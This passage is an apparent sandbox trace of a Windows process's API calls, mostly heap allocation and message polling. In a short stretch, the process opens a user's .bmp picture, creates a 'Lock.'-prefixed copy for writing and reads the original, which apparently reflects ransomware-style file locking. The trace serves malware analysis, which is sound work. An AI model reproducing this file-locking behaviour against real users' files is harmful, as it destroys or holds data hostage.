lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.753] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.753] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/VLD3Nk1TIwkGNmyGPC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vld3nk1tiwkgnmygpc.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0256.754] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0256.754] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0256.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0256.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.VLD3Nk1TIwkGNmyGPC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.vld3nk1tiwkgnmygpc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0256.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0256.756] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.756] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.756] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.756] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.756] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0256.756] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xd25, lpOverlapped=0x0) returned 1 [0256.757] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0256.757] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd25) returned 0x2416270 [0256.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.758] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0256.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.758] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0256.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.763] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.764] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0256.764] 